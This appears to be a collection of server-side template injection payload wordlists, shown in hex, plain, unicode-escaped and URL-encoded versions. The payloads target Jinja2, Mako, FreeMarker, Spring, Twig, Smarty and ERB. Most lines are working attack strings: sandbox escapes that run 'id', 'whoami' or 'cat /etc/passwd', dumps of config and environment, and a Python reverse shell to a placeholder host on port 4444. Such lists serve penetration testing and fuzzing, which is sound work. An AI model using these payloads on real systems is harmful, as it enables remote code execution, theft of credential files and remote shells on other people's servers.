7b2520666f72207820696e2028292e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f282920257d7b2520696620227761726e696e672220696e20782e5f5f6e616d655f5f20257d7b7b7828292e5f6d6f64756c652e5f5f6275696c74696e735f5f5b275f5f696d706f72745f5f275d28276f7327292e706f70656e2822707974686f6e33202d632027696d706f727420736f636b65742c73756270726f636573732c6f733b733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c736f636b65742e534f434b5f53545245414d293b732e636f6e6e65637428285c2269705c222c3434343429293b6f732e6475703228732e66696c656e6f28292c30293b206f732e6475703228732e66696c656e6f28292c31293b206f732e6475703228732e66696c656e6f28292c32293b703d73756270726f636573732e63616c6c285b5c222f62696e2f6361745c222c205c22666c61672e7478745c225d293b2722292e7265616428292e7a66696c6c28343137297d7d7b25656e646966257d7b2520656e64666f7220257d0a 90 | 7b2520666f72207820696e2028292e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f282920257d7b2520696620227761726e696e672220696e20782e5f5f6e616d655f5f20257d7b7b7828292e5f6d6f64756c652e5f5f6275696c74696e735f5f5b275f5f696d706f72745f5f275d28276f7327292e706f70656e28726571756573742e617267732e696e707574292e7265616428297d7d7b25656e646966257d7b25656e64666f72257d0a 91 | 7b34322a34327d0a 92 | 7b5e78797a6d34327d313736347b2f78797a6d34327d0a 93 | 7b7068707d6563686f20606964603b7b2f7068707d0a 94 | 7b7b2027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f2829207d7d0a 95 | 7b7b2027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28295b34305d28272f6574632f70617373776427292e726561642829207d7d0a 96 | 7b7b205b5d2e636c6173732e626173652e737562636c61737365732829207d7d0a 97 | 7b7b20636f6e6669672e6974656d7328295b345d5b315d2e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28295b34305d28222f6574632f70617373776422292e726561642829207d7d0a 98 | 7b7b2072657175657374207d7d0a 99 | 7b7b27272e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f28295b3232375d2827636174202f6574632f706173737764272c207368656c6c3d547275652c207374646f75743d2d31292e636f6d6d756e696361746528297d7d0a 100 | 7b7b27272e5f5f636c6173735f5f2e6d726f28295b315d2e5f5f737562636c61737365735f5f28295b3339365d2827636174202f6574632f706173737764272c7368656c6c3d547275652c7374646f75743d2d31292e636f6d6d756e696361746528295b305d2e737472697028297d7d0a 101 | 7b7b27272e5f5f636c6173735f5f2e6d726f28295b315d2e5f5f737562636c61737365735f5f28295b3339365d282763617420666c61672e747874272c7368656c6c3d547275652c7374646f75743d2d31292e636f6d6d756e696361746528295b305d2e737472697028297d7d0a 102 | 7b7b27272e636c6173732e6d726f28295b315d2e737562636c617373657328297d7d0a 103 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c226e6577206a6176612e6c616e672e537472696e67282778787827295c22297d7d0a 104 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c226e6574737461745c5c5c22293b206f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c732e746f537472696e6728782e737461727428292e676574496e70757453747265616d2829295c22297d7d0a 105 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c22756e616d655c5c5c222c5c5c5c222d615c5c5c22293b206f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c732e746f537472696e6728782e737461727428292e676574496e70757453747265616d2829295c22297d7d0a 106 | 7b7b2761272e676574436c61737328292e666f724e616d6528276a617661782e7363726970742e536372697074456e67696e654d616e6167657227292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528274a61766153637269707427292e6576616c285c2276617220783d6e6577206a6176612e6c616e672e50726f636573734275696c6465723b20782e636f6d6d616e64285c5c5c2277686f616d695c5c5c22293b20782e737461727428295c22297d7d0a 107 | 7b7b2761272e746f55707065724361736528297d7d0a 108 | 7b7b322a327d7d5b5b332a335d5d0a 109 | 7b7b332a2733277d7d0a 110 | 7b7b332a337d7d0a 111 | 7b7b342a347d7d5b5b352a355d5d0a 112 | 7b7b34322a34327d7d0a 113 | 7b7b372a2737277d7d0a 114 | 7b7b372a377d7d0a 115 | 7b7b372a377d7d247b372a377d3c253d20372a3720253e247b7b372a377d7d237b372a377d247b7b3c255b2527227d7d255c0a 116 | 7b7b3d34322a34327d7d0a 117 | 7b7b5b27636174244946532f6574632f706173737764275d7c66696c746572282773797374656d27297d7d0a 118 | 7b7b5b276361745c7832302f6574632f706173737764275d7c66696c746572282773797374656d27297d7d0a 119 | 7b7b5b276964275d7c66696c746572282773797374656d27297d7d0a 120 | 7b7b6170702e726571756573742e71756572792e66696c74657228302c302c313032342c7b276f7074696f6e73273a2773797374656d277d297d7d0a 121 | 7b7b6170702e726571756573742e7365727665722e616c6c7c6a6f696e28272c27297d7d0a 122 | 7b7b636f6e6669672e5f5f636c6173735f5f2e5f5f696e69745f5f2e5f5f676c6f62616c735f5f5b276f73275d2e706f70656e28276c7327292e7265616428297d7d0a 123 | 7b7b636f6e6669672e6974656d7328297d7d0a 124 | 7b7b6379636c65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 125 | 7b7b64756d7028617070297d7d0a 126 | 7b7b6a6f696e65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 127 | 7b7b6e616d6573706163652e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 128 | 7b7b726571756573742e5f5f636c6173735f5f7d7d0a 129 | 7b7b726571756573747c6174747228225f5f636c6173735f5f22297d7d0a 130 | 7b7b726571756573747c6174747228276170706c69636174696f6e27297c6174747228275c7835665c783566676c6f62616c735c7835665c78356627297c6174747228275c7835665c7835666765746974656d5c7835665c783566272928275c7835665c7835666275696c74696e735c7835665c78356627297c6174747228275c7835665c7835666765746974656d5c7835665c783566272928275c7835665c783566696d706f72745c7835665c783566272928276f7327297c617474722827706f70656e27292827696427297c61747472282772656164272928297d7d0a 131 | 7b7b726571756573747c61747472285b225f222a322c22636c617373222c225f222a325d7c6a6f696e297d7d0a 132 | 7b7b726571756573747c61747472285b225f5f222c22636c617373222c225f5f225d7c6a6f696e297d7d0a 133 | 7b7b726571756573747c61747472285b726571756573742e617267732e7573632a322c726571756573742e617267732e636c6173732c726571756573742e617267732e7573632a325d7c6a6f696e297d7d0a 134 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6379636c65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 135 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6a6f696e65722e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 136 | 7b7b73656c662e5f54656d706c6174655265666572656e63655f5f636f6e746578742e6e616d6573706163652e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e6f737d7d0a 137 | 7b7b73656c667d7d0a 138 | 7b7b7b34322a34327d7d7d 139 | -------------------------------------------------------------------------------- /SSTI/ssti.txt: -------------------------------------------------------------------------------- 1 | #{ 3 * 3 } 2 | #{ 7 * 7 } 3 | #{3*3} 4 | #{42*42} 5 | #{7*7} 6 | ${"freemarker.template.utility.Execute"?new()("id")} 7 | ${3*3} 8 | ${42*42} 9 | ${6*6} 10 | ${7*7} 11 | ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} 12 | ${T(java.lang.System).getenv()} 13 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} 14 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} 15 | ${donotexists|42*42} 16 | ${self.__init__.__globals__['util'].os.system('id')} 17 | ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} 18 | ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} 19 | ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} 20 | ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} 21 | ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} 22 | ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} 23 | ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} 24 | ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} 25 | ${self.context._with_template._mmarker.module.cache.util.os.system("id")} 26 | ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} 27 | ${self.context._with_template.module.cache.compat.inspect.os.system("id")} 28 | ${self.context._with_template.module.cache.util.os.system("id")} 29 | ${self.context._with_template.module.filters.compat.inspect.os.system("id")} 30 | ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} 31 | ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} 32 | ${self.context._with_template.module.runtime.util.os.system("id")} 33 | ${self.module.cache.compat.inspect.linecache.os.system("id")} 34 | ${self.module.cache.compat.inspect.os.system("id")} 35 | ${self.module.cache.util.compat.inspect.linecache.os.system("id")} 36 | ${self.module.cache.util.compat.inspect.os.system("id")} 37 | ${self.module.filters.compat.inspect.linecache.os.system("id")} 38 | ${self.module.filters.compat.inspect.os.system("id")} 39 | ${self.module.runtime.compat.inspect.linecache.os.system("id")} 40 | ${self.module.runtime.compat.inspect.os.system("id")} 41 | ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} 42 | ${self.module.runtime.exceptions.compat.inspect.os.system("id")} 43 | ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} 44 | ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} 45 | ${self.module.runtime.exceptions.util.os.system("id")} 46 | ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} 47 | ${self.module.runtime.util.compat.inspect.os.system("id")} 48 | ${self.module.runtime.util.os.system("id")} 49 | ${self.template.__init__.__globals__['os'].system('id')} 50 | ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} 51 | ${self.template._mmarker.module.cache.util.os.system("id")} 52 | ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} 53 | ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} 54 | ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} 55 | ${self.template._mmarker.module.runtime.util.os.system("id")} 56 | ${self.template.module.cache.compat.inspect.linecache.os.system("id")} 57 | ${self.template.module.cache.compat.inspect.os.system("id")} 58 | ${self.template.module.cache.util.compat.inspect.os.system("id")} 59 | ${self.template.module.cache.util.os.system("id")} 60 | ${self.template.module.filters.compat.inspect.linecache.os.system("id")} 61 | ${self.template.module.filters.compat.inspect.os.system("id")} 62 | ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} 63 | ${self.template.module.runtime.compat.inspect.os.system("id")} 64 | ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} 65 | ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} 66 | ${self.template.module.runtime.exceptions.util.os.system("id")} 67 | ${self.template.module.runtime.util.compat.inspect.os.system("id")} 68 | ${self.template.module.runtime.util.os.system("id")} 69 | ${{3*3}} 70 | ${{7*7}} 71 | ${{<%[%'"}}%\ 72 | *{7*7} 73 | *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} 74 | 42*42 75 | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} 76 | <%= 3 * 3 %> 77 | <%= 7 * 7 %> 78 | <%= 7*7 %> 79 | <%= File.open('/etc/passwd').read %> 80 | <%=42*42 %> 81 | @(1+2) 82 | @(6+5) 83 | [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} 84 | [7*7] 85 | [[${42*42}]] 86 | {$smarty.version} 87 | {% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %} 88 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %} 89 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} 90 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} 91 | {42*42} 92 | {^xyzm42}1764{/xyzm42} 93 | {php}echo `id`;{/php} 94 | {{ ''.__class__.__mro__[2].__subclasses__() }} 95 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 96 | {{ [].class.base.subclasses() }} 97 | {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} 98 | {{ request }} 99 | {{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}} 100 | {{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}} 101 | {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} 102 | {{''.class.mro()[1].subclasses()}} 103 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} 104 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 105 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 106 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} 107 | {{'a'.toUpperCase()}} 108 | {{2*2}}[[3*3]] 109 | {{3*'3'}} 110 | {{3*3}} 111 | {{4*4}}[[5*5]] 112 | {{42*42}} 113 | {{7*'7'}} 114 | {{7*7}} 115 | {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\ 116 | {{=42*42}} 117 | {{['cat$IFS/etc/passwd']|filter('system')}} 118 | {{['cat\x20/etc/passwd']|filter('system')}} 119 | {{['id']|filter('system')}} 120 | {{app.request.query.filter(0,0,1024,{'options':'system'})}} 121 | {{app.request.server.all|join(',')}} 122 | {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 123 | {{config.items()}} 124 | {{cycler.__init__.__globals__.os}} 125 | {{dump(app)}} 126 | {{joiner.__init__.__globals__.os}} 127 | {{namespace.__init__.__globals__.os}} 128 | {{request.__class__}} 129 | {{request|attr("__class__")}} 130 | {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} 131 | {{request|attr(["_"*2,"class","_"*2]|join)}} 132 | {{request|attr(["__","class","__"]|join)}} 133 | {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} 134 | {{self._TemplateReference__context.cycler.__init__.__globals__.os}} 135 | {{self._TemplateReference__context.joiner.__init__.__globals__.os}} 136 | {{self._TemplateReference__context.namespace.__init__.__globals__.os}} 137 | {{self}} 138 | {{{42*42}}} -------------------------------------------------------------------------------- /SSTI/unicode_encoded.txt: -------------------------------------------------------------------------------- 1 | #{ 3 * 3 }\n 2 | #{ 7 * 7 }\n 3 | #{3*3}\n 4 | #{42*42}\n 5 | #{7*7}\n 6 | ${"freemarker.template.utility.Execute"?new()("id")}\n 7 | ${3*3}\n 8 | ${42*42}\n 9 | ${6*6}\n 10 | ${7*7}\n 11 | ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}\n 12 | ${T(java.lang.System).getenv()}\n 13 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}\n 14 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}\n 15 | ${donotexists|42*42}\n 16 | ${self.__init__.__globals__['util'].os.system('id')}\n 17 | ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}\n 18 | ${self.attr._NSAttr__parent.module.cache.util.os.system("id")}\n 19 | ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}\n 20 | ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}\n 21 | ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}\n 22 | ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}\n 23 | ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}\n 24 | ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}\n 25 | ${self.context._with_template._mmarker.module.cache.util.os.system("id")}\n 26 | ${self.context._with_template._mmarker.module.runtime.util.os.system("id")}\n 27 | ${self.context._with_template.module.cache.compat.inspect.os.system("id")}\n 28 | ${self.context._with_template.module.cache.util.os.system("id")}\n 29 | ${self.context._with_template.module.filters.compat.inspect.os.system("id")}\n 30 | ${self.context._with_template.module.runtime.compat.inspect.os.system("id")}\n 31 | ${self.context._with_template.module.runtime.exceptions.util.os.system("id")}\n 32 | ${self.context._with_template.module.runtime.util.os.system("id")}\n 33 | ${self.module.cache.compat.inspect.linecache.os.system("id")}\n 34 | ${self.module.cache.compat.inspect.os.system("id")}\n 35 | ${self.module.cache.util.compat.inspect.linecache.os.system("id")}\n 36 | ${self.module.cache.util.compat.inspect.os.system("id")}\n 37 | ${self.module.filters.compat.inspect.linecache.os.system("id")}\n 38 | ${self.module.filters.compat.inspect.os.system("id")}\n 39 | ${self.module.runtime.compat.inspect.linecache.os.system("id")}\n 40 | ${self.module.runtime.compat.inspect.os.system("id")}\n 41 | ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}\n 42 | ${self.module.runtime.exceptions.compat.inspect.os.system("id")}\n 43 | ${self.module.runtime.exceptions.traceback.linecache.os.system("id")}\n 44 | ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}\n 45 | ${self.module.runtime.exceptions.util.os.system("id")}\n 46 | ${self.module.runtime.util.compat.inspect.linecache.os.system("id")}\n 47 | ${self.module.runtime.util.compat.inspect.os.system("id")}\n 48 | ${self.module.runtime.util.os.system("id")}\n 49 | ${self.template.__init__.__globals__['os'].system('id')}\n 50 | ${self.template._mmarker.module.cache.compat.inspect.os.system("id")}\n 51 | ${self.template._mmarker.module.cache.util.os.system("id")}\n 52 | ${self.template._mmarker.module.filters.compat.inspect.os.system("id")}\n 53 | ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}\n 54 | ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}\n 55 | ${self.template._mmarker.module.runtime.util.os.system("id")}\n 56 | ${self.template.module.cache.compat.inspect.linecache.os.system("id")}\n 57 | ${self.template.module.cache.compat.inspect.os.system("id")}\n 58 | ${self.template.module.cache.util.compat.inspect.os.system("id")}\n 59 | ${self.template.module.cache.util.os.system("id")}\n 60 | ${self.template.module.filters.compat.inspect.linecache.os.system("id")}\n 61 | ${self.template.module.filters.compat.inspect.os.system("id")}\n 62 | ${self.template.module.runtime.compat.inspect.linecache.os.system("id")}\n 63 | ${self.template.module.runtime.compat.inspect.os.system("id")}\n 64 | ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}\n 65 | ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}\n 66 | ${self.template.module.runtime.exceptions.util.os.system("id")}\n 67 | ${self.template.module.runtime.util.compat.inspect.os.system("id")}\n 68 | ${self.template.module.runtime.util.os.system("id")}\n 69 | ${{3*3}}\n 70 | ${{7*7}}\n 71 | ${{<%[%'"}}%\\\n 72 | *{7*7}\n 73 | *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}\n 74 | 42*42\n 75 | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}\n 76 | <%= 3 * 3 %>\n 77 | <%= 7 * 7 %>\n 78 | <%= 7*7 %>\n 79 | <%= File.open('/etc/passwd').read %>\n 80 | <%=42*42 %>\n 81 | @(1+2)\n 82 | @(6+5)\n 83 | [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}\n 84 | [7*7]\n 85 | [[${42*42}]]\n 86 | {$smarty.version}\n 87 | {% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %}\n 88 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"ip\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/cat\\", \\"/etc/passwd\\"]);'").read().zfill(417)}}{%endif%}{% endfor %}\n 89 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"ip\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/cat\\", \\"flag.txt\\"]);'").read().zfill(417)}}{%endif%}{% endfor %}\n 90 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}\n 91 | {42*42}\n 92 | {^xyzm42}1764{/xyzm42}\n 93 | {php}echo `id`;{/php}\n 94 | {{ ''.__class__.__mro__[2].__subclasses__() }}\n 95 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}\n 96 | {{ [].class.base.subclasses() }}\n 97 | {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}\n 98 | {{ request }}\n 99 | {{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}\n 100 | {{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}\n 101 | {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}\n 102 | {{''.class.mro()[1].subclasses()}}\n 103 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\"new java.lang.String('xxx')\\")}}\n 104 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\"var x=new java.lang.ProcessBuilder; x.command(\\\\\\"netstat\\\\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\\")}}\n 105 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\"var x=new java.lang.ProcessBuilder; x.command(\\\\\\"uname\\\\\\",\\\\\\"-a\\\\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\\")}}\n 106 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\"var x=new java.lang.ProcessBuilder; x.command(\\\\\\"whoami\\\\\\"); x.start()\\")}}\n 107 | {{'a'.toUpperCase()}}\n 108 | {{2*2}}[[3*3]]\n 109 | {{3*'3'}}\n 110 | {{3*3}}\n 111 | {{4*4}}[[5*5]]\n 112 | {{42*42}}\n 113 | {{7*'7'}}\n 114 | {{7*7}}\n 115 | {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\\\n 116 | {{=42*42}}\n 117 | {{['cat$IFS/etc/passwd']|filter('system')}}\n 118 | {{['cat\\x20/etc/passwd']|filter('system')}}\n 119 | {{['id']|filter('system')}}\n 120 | {{app.request.query.filter(0,0,1024,{'options':'system'})}}\n 121 | {{app.request.server.all|join(',')}}\n 122 | {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}\n 123 | {{config.items()}}\n 124 | {{cycler.__init__.__globals__.os}}\n 125 | {{dump(app)}}\n 126 | {{joiner.__init__.__globals__.os}}\n 127 | {{namespace.__init__.__globals__.os}}\n 128 | {{request.__class__}}\n 129 | {{request|attr("__class__")}}\n 130 | {{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fbuiltins\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fimport\\x5f\\x5f')('os')|attr('popen')('id')|attr('read')()}}\n 131 | {{request|attr(["_"*2,"class","_"*2]|join)}}\n 132 | {{request|attr(["__","class","__"]|join)}}\n 133 | {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}\n 134 | {{self._TemplateReference__context.cycler.__init__.__globals__.os}}\n 135 | {{self._TemplateReference__context.joiner.__init__.__globals__.os}}\n 136 | {{self._TemplateReference__context.namespace.__init__.__globals__.os}}\n 137 | {{self}}\n 138 | {{{42*42}}} 139 | -------------------------------------------------------------------------------- /SSTI/url_encoded.txt: -------------------------------------------------------------------------------- 1 | %23%7B%203%20%2A%203%20%7D 2 | %23%7B%207%20%2A%207%20%7D 3 | %23%7B3%2A3%7D 4 | %23%7B42%2A42%7D 5 | %23%7B7%2A7%7D 6 | %24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D 7 | %24%7B3%2A3%7D 8 | %24%7B42%2A42%7D 9 | %24%7B6%2A6%7D 10 | %24%7B7%2A7%7D 11 | %24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27cat%20etc/passwd%27%29%7D 12 | 